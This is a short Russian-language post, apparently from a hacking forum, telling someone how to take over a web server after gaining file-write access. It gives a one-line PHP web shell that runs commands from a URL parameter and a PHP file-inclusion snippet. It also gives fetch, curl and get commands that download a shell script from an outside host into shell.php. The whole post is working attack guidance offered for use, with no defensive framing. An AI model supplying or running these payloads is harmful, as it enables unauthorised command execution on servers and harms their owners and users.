Если у тебя есть возможность создать файл тогда пиши <?php system($_GET[cmd]);?>
или <?php include($_GET[open]);?>
В первом случае у тебя уже шелл во втором ты его можеш проинклудить и после выполнить то что сказал киборг если же это фря в гета там может и не быть тогда
fetch -o shell.php http://freeshell.ru/myshell.txt курл и гет
curl -o shell.php http://freeshell.ru/myshell.txt
get -o shell.php http://freeshell.ru/myshell.txt